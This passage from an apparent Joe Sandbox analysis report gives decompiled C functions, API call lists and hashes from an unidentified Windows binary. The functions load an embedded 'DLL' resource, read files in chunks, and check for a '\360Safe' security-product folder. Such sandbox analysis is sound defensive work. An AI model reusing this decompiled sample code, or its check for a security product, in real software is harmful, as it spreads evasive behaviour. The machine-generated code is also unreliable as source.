                                                                                                                                                                                            • Part of subcall function 00D0EFCA: EnterCriticalSection.KERNEL32(?,?,?,00D10DB7,0000000D,00D59190,00000008,00D0A68D,?,00000000), ref: 00D0EFF4
                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00D00954
                                                                                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00D00963
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,00D58A38,0000000C,00D10CFD,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C), ref: 00D00993
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5,?,?,?,00D10DB7,0000000D), ref: 00D009A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2714421763-0
                                                                                                                                                                                          • Opcode ID: ec019180edb8e24918b43c78211431c5737652ee7839733f8d15ff0046c6973c
                                                                                                                                                                                          • Instruction ID: 014f718583ae8aeb839cb10fedbe84199cfea54ceac928435883a5075af2f22b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec019180edb8e24918b43c78211431c5737652ee7839733f8d15ff0046c6973c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E016231904306BAEB306BB4BD1A75E7E64EF00761F284119F44DA62C2CF7889449F75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEED40 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CEED40(void* __eflags, struct HINSTANCE__* _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16) {
				void* __edi;
				struct HRSRC__* _t9;
				void* _t11;
				long _t15;
				intOrPtr* _t17;
				struct HRSRC__* _t18;

				_t17 = _a16;
				E00D006A0(_t17, _t17, 0, 8);
				_t9 = FindResourceW(_a4, _a8, _a12); // executed
				_t18 = _t9;
				if(_t18 != 0) {
					_t15 = SizeofResource(_a4, _t18);
					_t11 = LoadResource(_a4, _t18);
					if(_t11 != 0) {
						 *_t17 = LockResource(_t11);
						 *((intOrPtr*)(_t17 + 4)) = _t15;
						_t11 = 1;
					}
					return _t11;
				}
				return _t9;
			}









                                                                                                                                                                                          0x00ceed45
                                                                                                                                                                                          0x00ceed4d
                                                                                                                                                                                          0x00ceed5e
                                                                                                                                                                                          0x00ceed64
                                                                                                                                                                                          0x00ceed68
                                                                                                                                                                                          0x00ceed79
                                                                                                                                                                                          0x00ceed7b
                                                                                                                                                                                          0x00ceed83
                                                                                                                                                                                          0x00ceed8c
                                                                                                                                                                                          0x00ceed90
                                                                                                                                                                                          0x00ceed93
                                                                                                                                                                                          0x00ceed93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceed94
                                                                                                                                                                                          0x00ceed98

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEED4D
                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 00CEED5E
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00CEED6F
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00CEED7B
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00CEED86
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3046278646-0
                                                                                                                                                                                          • Opcode ID: b02d947be7a903afd25b9b46ffc4a1dbfd64ed5db98200e7649548a93ec4dabf
                                                                                                                                                                                          • Instruction ID: 76da81e6552d4c29268410847e70f6dc51db185bb03f114112ce8a59cfafedab
                                                                                                                                                                                          • Opcode Fuzzy Hash: b02d947be7a903afd25b9b46ffc4a1dbfd64ed5db98200e7649548a93ec4dabf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0BE72600309BBDB115FA5EC48E9B7FA9FF457A1F048020FA58D6260D772C920DBB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CECCC4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00CECCC4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;
				signed int _t47;
				void* _t53;
				char* _t73;
				void* _t77;
				void* _t78;
				void* _t79;

				_t79 = __eflags;
				_t71 = __edx;
				_push(0xc);
				E00D0155A(0xd379f1, __ebx, __edi, __esi);
				_t53 = __ecx;
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				_t73 = L"\\360Safe";
				E00C9B6E5(_t78 - 0x10, __edx, _t78, _t73);
				_push( *((intOrPtr*)( *(_t78 - 0x10) - 8)));
				_push(_t78 - 0x14);
				 *(_t78 - 4) = 1;
				E00CA6FC8(__ecx, _t78 + 8, _t73, __esi, _t79);
				 *(_t78 - 4) = 2;
				E00C998FD(__ecx, _t78 - 0x14, _t71);
				CharUpperW( *(_t78 - 0x14));
				E00C998FD(_t53, _t78 - 0x10, _t71);
				CharUpperW( *(_t78 - 0x10));
				_t37 = E00CDCED8(_t78 - 0x14, _t78 - 0x10);
				_t80 = _t37;
				_t38 = _t78 + 8;
				if(_t37 == 0) {
					_t39 = E00CEC3CD(_t53, __eflags, _t38); // executed
					__eflags = _t39;
					if(_t39 != 0) {
						goto L7;
					} else {
						_t77 = 0;
						__eflags = 0;
					}
					goto L6;
				} else {
					_push(_t73);
					_push(_t38);
					_push(_t78 - 0x18);
					_t47 = E00CEC3CD(_t53, _t80, E00C9B7F5(_t53, _t71, _t73, CharUpperW, _t80));
					asm("sbb bl, bl");
					E00C9820F(_t78 - 0x18);
					if( ~_t47 + 1 == 0) {
						L7:
						_t77 = 1;
						L6:
						E00C9820F(_t78 - 0x14);
						E00C9820F(_t78 - 0x10);
						E00C9820F(_t78 + 8);
						_t43 = _t77;
					} else {
						E00C9820F(_t78 - 0x14);
						E00C9820F(_t78 - 0x10);
						E00C9820F(_t78 + 8);
						_t43 = 0;
					}
				}
				return E00D01632(_t43);
			}













                                                                                                                                                                                          0x00ceccc4
                                                                                                                                                                                          0x00ceccc4
                                                                                                                                                                                          0x00ceccc4
                                                                                                                                                                                          0x00cecccb
                                                                                                                                                                                          0x00ceccd0
                                                                                                                                                                                          0x00ceccd2
                                                                                                                                                                                          0x00ceccd6
                                                                                                                                                                                          0x00ceccdf
                                                                                                                                                                                          0x00cecce7
                                                                                                                                                                                          0x00cecced
                                                                                                                                                                                          0x00ceccf1
                                                                                                                                                                                          0x00ceccf5
                                                                                                                                                                                          0x00ceccfd
                                                                                                                                                                                          0x00cecd01
                                                                                                                                                                                          0x00cecd0f
                                                                                                                                                                                          0x00cecd14
                                                                                                                                                                                          0x00cecd1c
                                                                                                                                                                                          0x00cecd26
                                                                                                                                                                                          0x00cecd2b
                                                                                                                                                                                          0x00cecd2d
                                                                                                                                                                                          0x00cecd30
                                                                                                                                                                                          0x00cecd7e
                                                                                                                                                                                          0x00cecd83
                                                                                                                                                                                          0x00cecd85
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecd87
                                                                                                                                                                                          0x00cecd87
                                                                                                                                                                                          0x00cecd87
                                                                                                                                                                                          0x00cecd87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecd32
                                                                                                                                                                                          0x00cecd32
                                                                                                                                                                                          0x00cecd33
                                                                                                                                                                                          0x00cecd37
                                                                                                                                                                                          0x00cecd40
                                                                                                                                                                                          0x00cecd49
                                                                                                                                                                                          0x00cecd50
                                                                                                                                                                                          0x00cecd57
                                                                                                                                                                                          0x00cecda5
                                                                                                                                                                                          0x00cecda7
                                                                                                                                                                                          0x00cecd89
                                                                                                                                                                                          0x00cecd8c
                                                                                                                                                                                          0x00cecd94
                                                                                                                                                                                          0x00cecd9c
                                                                                                                                                                                          0x00cecda1
                                                                                                                                                                                          0x00cecd59
                                                                                                                                                                                          0x00cecd5c
                                                                                                                                                                                          0x00cecd64
                                                                                                                                                                                          0x00cecd6c
                                                                                                                                                                                          0x00cecd71
                                                                                                                                                                                          0x00cecd71
                                                                                                                                                                                          0x00cecd57
                                                                                                                                                                                          0x00cecd78

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CECCCB
                                                                                                                                                                                            • Part of subcall function 00CA6FC8: __EH_prolog3.LIBCMT ref: 00CA6FCF
                                                                                                                                                                                          • CharUpperW.USER32(?,?,?,\360Safe,0000000C,00CEDA80,?,?,?,:\360Safe,00000000,?,00000000), ref: 00CECD0F
                                                                                                                                                                                          • CharUpperW.USER32(?,?,:\360Safe,00000000,?,00000000), ref: 00CECD1C
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: __EH_prolog3.LIBCMT ref: 00C9B7FC
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: lstrlenW.KERNEL32(00000001,?,?,?,?,00000004), ref: 00C9B823
                                                                                                                                                                                            • Part of subcall function 00CEC3CD: _memset.LIBCMT ref: 00CEC3FD
                                                                                                                                                                                            • Part of subcall function 00CEC3CD: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,\360Safe,746CB8D0), ref: 00CEC439
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3$CharUpper$DecrementFileFindFirstInterlocked_memsetlstrlen
                                                                                                                                                                                          • String ID: \360Safe
                                                                                                                                                                                          • API String ID: 355328121-334529204
                                                                                                                                                                                          • Opcode ID: 4a99766b3a98a3db753b37fc7a58b4b7fc616ae305cbfb328a3641f7ee899130
                                                                                                                                                                                          • Instruction ID: dcc9b9ea3de6da989144e047d79240ee204dc44d739b023f58f72b67ffd937c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a99766b3a98a3db753b37fc7a58b4b7fc616ae305cbfb328a3641f7ee899130
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0211D7298055A9BCF04EBB0CD96EEEB778AF55340F000528B516A71D2EF345B09EBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C850A0 Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E00C850A0(intOrPtr* __eax, void* __edi) {
				intOrPtr _t55;
				signed int _t58;
				long _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				int _t76;
				int _t79;
				long _t84;
				void* _t87;
				union _LARGE_INTEGER _t88;
				signed int _t89;
				signed int _t98;
				void* _t106;
				intOrPtr* _t108;
				signed int _t110;
				intOrPtr* _t111;
				long _t112;
				void* _t113;

				_t106 = __edi;
				_t111 =  *((intOrPtr*)(_t113 + 0x38));
				_t87 = __eax + 0xccc;
				_t55 =  *__eax;
				 *(_t113 + 0x24) = _t87;
				 *((intOrPtr*)(_t113 + 0x20)) = _t55;
				__imp__GetFileSizeEx(_t55, _t111);
				if(_t55 != 0) {
					_t88 = 0;
					_t108 =  *((intOrPtr*)(_t113 + 0x34)) + 8;
					 *(_t113 + 0x28) = 0;
					 *(_t113 + 0x2c) = 0;
					 *((intOrPtr*)(_t113 + 0xc)) = 0;
					 *((intOrPtr*)(_t113 + 0x14)) = _t108;
					L3:
					while(1) {
						if( *((intOrPtr*)(_t113 + 0xc)) !=  *((intOrPtr*)(_t113 + 0x38))) {
							_t58 =  *((intOrPtr*)(_t108 - 8)) - _t88;
							_t89 =  *(_t108 - 4);
						} else {
							_t58 =  *_t111 - _t88;
							_t89 =  *(_t111 + 4);
						}
						asm("sbb ecx, edx");
						_t98 = (_t89 << 0x00000020 | _t58) >> 0xf;
						_t59 = _t58 & 0x00007fff;
						 *(_t113 + 0x10) = _t98;
						_t112 = _t59;
						if(_t59 != 0) {
							_t98 = _t98 + 1;
							 *(_t113 + 0x10) = _t98;
						} else {
							_t112 = 0x8000;
						}
						if(_t98 <= 0) {
							L20:
							if( *((intOrPtr*)(_t113 + 0xc)) >=  *((intOrPtr*)(_t113 + 0x38))) {
								L27:
								_t61 =  *((intOrPtr*)(_t113 + 0xc)) + 1;
								_t108 = _t108 + 0x18;
								 *((intOrPtr*)(_t113 + 0xc)) = _t61;
								 *((intOrPtr*)(_t113 + 0x14)) = _t108;
								if(_t61 >  *((intOrPtr*)(_t113 + 0x38))) {
									goto L32;
								} else {
									_t111 =  *((intOrPtr*)(_t113 + 0x3c));
									_t88 =  *(_t113 + 0x28);
									continue;
								}
							} else {
								_t63 =  *_t108;
								if(_t63 == 0) {
									L32:
									return 1;
								} else {
									if(E00C81D60 == 0 ||  *((intOrPtr*)(_t108 + 4)) == 0) {
										L26:
										 *(_t113 + 0x28) =  *_t108 +  *((intOrPtr*)(_t108 - 8));
										asm("adc eax, ecx");
										 *(_t113 + 0x2c) =  *(_t108 - 4);
										goto L27;
									} else {
										if(_t63 > 0x8000) {
											E00C88420(8, 0xd47270);
											return 0;
										} else {
											E00D006A0(_t106, _t87, 0, _t63);
											_t113 = _t113 + 0xc;
											if(E00C81D60(_t106, _t87,  *_t108) == 0) {
												E00C88420(0x11, 0xd47270);
												return 0;
											} else {
												goto L26;
											}
										}
									}
								}
							}
						} else {
							while(1) {
								_push(0);
								_t76 = SetFilePointerEx( *(_t113 + 0x18),  *(_t113 + 0x28),  *(_t113 + 0x2c), 0); // executed
								if(_t76 == 0) {
									goto L1;
								}
								_t79 = ReadFile( *(_t113 + 0x18), _t87, _t112, _t113 + 0x24, 0); // executed
								if(_t79 == 0) {
									goto L1;
								} else {
									if(_t112 !=  *((intOrPtr*)(_t113 + 0x20))) {
										E00C88420(1, 0xd47270);
										return 0;
									} else {
										if(E00C81D60 != 0) {
											_t110 =  *(_t106 + 0x20) & 0x0000003f;
											_t84 = _t112;
											if(_t112 > 0) {
												do {
													 *((char*)(_t106 + _t110 + 0x28)) =  *_t87;
													_t110 = _t110 + 1;
													_t87 = _t87 + 1;
													 *(_t106 + 0x20) =  *(_t106 + 0x20) + 1;
													asm("adc dword [edi+0x24], 0x0");
													_t84 = _t84 - 1;
													 *(_t113 + 0x24) = _t84;
													if(_t110 == 0x40) {
														_t110 = 0;
														E00C873F0(_t106);
														_t84 =  *(_t113 + 0x24);
													}
												} while (_t84 > 0);
											}
											_t108 =  *((intOrPtr*)(_t113 + 0x14));
											_t87 =  *(_t113 + 0x1c);
										}
										 *(_t113 + 0x28) =  *(_t113 + 0x28) + _t112;
										_t112 = 0x8000;
										asm("adc dword [esp+0x2c], 0x0");
										_t38 = _t113 + 0x10;
										 *_t38 =  *(_t113 + 0x10) - 1;
										if( *_t38 != 0) {
											continue;
										} else {
											goto L20;
										}
									}
								}
								goto L33;
							}
							goto L1;
						}
						goto L33;
					}
				} else {
					L1:
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
				L33:
			}





















                                                                                                                                                                                          0x00c850a0
                                                                                                                                                                                          0x00c850a5
                                                                                                                                                                                          0x00c850aa
                                                                                                                                                                                          0x00c850b0
                                                                                                                                                                                          0x00c850b4
                                                                                                                                                                                          0x00c850b8
                                                                                                                                                                                          0x00c850bc
                                                                                                                                                                                          0x00c850c4
                                                                                                                                                                                          0x00c850eb
                                                                                                                                                                                          0x00c850ed
                                                                                                                                                                                          0x00c850f0
                                                                                                                                                                                          0x00c850f4
                                                                                                                                                                                          0x00c850f8
                                                                                                                                                                                          0x00c850fc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85100
                                                                                                                                                                                          0x00c85108
                                                                                                                                                                                          0x00c85117
                                                                                                                                                                                          0x00c85119
                                                                                                                                                                                          0x00c8510a
                                                                                                                                                                                          0x00c8510d
                                                                                                                                                                                          0x00c8510f
                                                                                                                                                                                          0x00c8510f
                                                                                                                                                                                          0x00c8511c
                                                                                                                                                                                          0x00c85120
                                                                                                                                                                                          0x00c85127
                                                                                                                                                                                          0x00c8512c
                                                                                                                                                                                          0x00c85130
                                                                                                                                                                                          0x00c85132
                                                                                                                                                                                          0x00c8513b
                                                                                                                                                                                          0x00c8513c
                                                                                                                                                                                          0x00c85134
                                                                                                                                                                                          0x00c85134
                                                                                                                                                                                          0x00c85134
                                                                                                                                                                                          0x00c85142
                                                                                                                                                                                          0x00c851f0
                                                                                                                                                                                          0x00c851f8
                                                                                                                                                                                          0x00c85248
                                                                                                                                                                                          0x00c8524c
                                                                                                                                                                                          0x00c8524d
                                                                                                                                                                                          0x00c85250
                                                                                                                                                                                          0x00c85254
                                                                                                                                                                                          0x00c8525c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8525e
                                                                                                                                                                                          0x00c8525e
                                                                                                                                                                                          0x00c85262
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85266
                                                                                                                                                                                          0x00c851fa
                                                                                                                                                                                          0x00c851fa
                                                                                                                                                                                          0x00c851fe
                                                                                                                                                                                          0x00c852c2
                                                                                                                                                                                          0x00c852cb
                                                                                                                                                                                          0x00c85204
                                                                                                                                                                                          0x00c8520b
                                                                                                                                                                                          0x00c85234
                                                                                                                                                                                          0x00c8523b
                                                                                                                                                                                          0x00c85242
                                                                                                                                                                                          0x00c85244
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85213
                                                                                                                                                                                          0x00c85218
                                                                                                                                                                                          0x00c85294
                                                                                                                                                                                          0x00c852a4
                                                                                                                                                                                          0x00c8521a
                                                                                                                                                                                          0x00c8521e
                                                                                                                                                                                          0x00c85225
                                                                                                                                                                                          0x00c85232
                                                                                                                                                                                          0x00c852af
                                                                                                                                                                                          0x00c852bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85232
                                                                                                                                                                                          0x00c85218
                                                                                                                                                                                          0x00c8520b
                                                                                                                                                                                          0x00c851fe
                                                                                                                                                                                          0x00c85148
                                                                                                                                                                                          0x00c85148
                                                                                                                                                                                          0x00c85154
                                                                                                                                                                                          0x00c8515b
                                                                                                                                                                                          0x00c85163
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85177
                                                                                                                                                                                          0x00c8517f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85185
                                                                                                                                                                                          0x00c85189
                                                                                                                                                                                          0x00c85279
                                                                                                                                                                                          0x00c85289
                                                                                                                                                                                          0x00c8518f
                                                                                                                                                                                          0x00c85196
                                                                                                                                                                                          0x00c8519b
                                                                                                                                                                                          0x00c8519e
                                                                                                                                                                                          0x00c851a2
                                                                                                                                                                                          0x00c851a4
                                                                                                                                                                                          0x00c851a6
                                                                                                                                                                                          0x00c851aa
                                                                                                                                                                                          0x00c851ab
                                                                                                                                                                                          0x00c851ac
                                                                                                                                                                                          0x00c851b0
                                                                                                                                                                                          0x00c851b4
                                                                                                                                                                                          0x00c851b5
                                                                                                                                                                                          0x00c851bc
                                                                                                                                                                                          0x00c851c0
                                                                                                                                                                                          0x00c851c2
                                                                                                                                                                                          0x00c851c7
                                                                                                                                                                                          0x00c851c7
                                                                                                                                                                                          0x00c851cb
                                                                                                                                                                                          0x00c851a4
                                                                                                                                                                                          0x00c851cf
                                                                                                                                                                                          0x00c851d3
                                                                                                                                                                                          0x00c851d3
                                                                                                                                                                                          0x00c851d7
                                                                                                                                                                                          0x00c851db
                                                                                                                                                                                          0x00c851e0
                                                                                                                                                                                          0x00c851e5
                                                                                                                                                                                          0x00c851e5
                                                                                                                                                                                          0x00c851ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c851ea
                                                                                                                                                                                          0x00c85189
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8517f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85148
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85142
                                                                                                                                                                                          0x00c850c6
                                                                                                                                                                                          0x00c850c6
                                                                                                                                                                                          0x00c850c6
                                                                                                                                                                                          0x00c850cb
                                                                                                                                                                                          0x00c850cd
                                                                                                                                                                                          0x00c850d4
                                                                                                                                                                                          0x00c850e4
                                                                                                                                                                                          0x00c850e4
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00C8611A,?,00000000,?), ref: 00C850BC
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00C8611A,?,00000000,?), ref: 00C8515B
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,00C8611A,?,00000000,?), ref: 00C85177
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8521E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerReadSize_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1834740430-0
                                                                                                                                                                                          • Opcode ID: 5b9c243f269bf71a605398c6b0b01748a5d6191e63982c04c54bc3980290e6d6
                                                                                                                                                                                          • Instruction ID: db4589a1ef415a459c0551c9af192267e422abd0a68c3de82c32699aca988571
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9c243f269bf71a605398c6b0b01748a5d6191e63982c04c54bc3980290e6d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB51C0716087019FD714EF29C88072FB7E4EB88718F44492DF899D7240EB75EE458B9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CED21B Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00CED21B(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t31;
				int _t33;
				int _t37;
				signed int _t55;
				signed short _t58;
				int _t64;
				signed int _t66;
				int _t68;
				void* _t69;

				_t44 = __ebx;
				_push(8);
				E00D0155A(0xd37c08, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t69 - 0x14)) = __ecx;
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				E00CAE7F0(_t69 + 8, 0x5c);
				E00C9CA59(_t69 + 8, 0xd48b4c);
				_t31 =  *(_t69 + 8);
				_t64 =  *(_t31 - 8);
				if(_t64 < 3) {
					L9:
					_t66 = 0;
					__eflags = _t64;
					if(_t64 <= 0) {
						L18:
						_t68 = 1;
					} else {
						do {
							__eflags = (_t31[_t66] & 0x0000ffff) - 0x5c;
							if(__eflags != 0) {
								goto L17;
							} else {
								_push(_t66);
								_push(_t69 - 0x10);
								E00C9B7A4(_t44, _t69 + 8, _t64, _t66, __eflags);
								 *(_t69 - 4) = 1;
								_t37 = PathFileExistsW( *(_t69 - 0x10)); // executed
								__eflags = _t37;
								if(_t37 != 0) {
									L16:
									 *(_t69 - 4) = 0;
